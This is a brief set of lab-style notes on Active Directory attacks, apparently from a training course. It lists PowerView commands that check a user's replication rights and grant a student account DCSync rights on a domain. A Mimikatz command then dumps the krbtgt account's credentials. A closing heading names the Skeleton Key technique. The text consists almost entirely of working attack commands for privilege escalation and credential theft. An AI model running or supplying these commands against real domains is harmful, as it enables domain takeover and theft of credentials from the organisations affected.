Check if user has replication rights
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "student648") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
Adding rights
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName student648 -Rights DCSync -Verbose
Dumping Creds
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\\krbtgt"'
Resources
Skeleton Key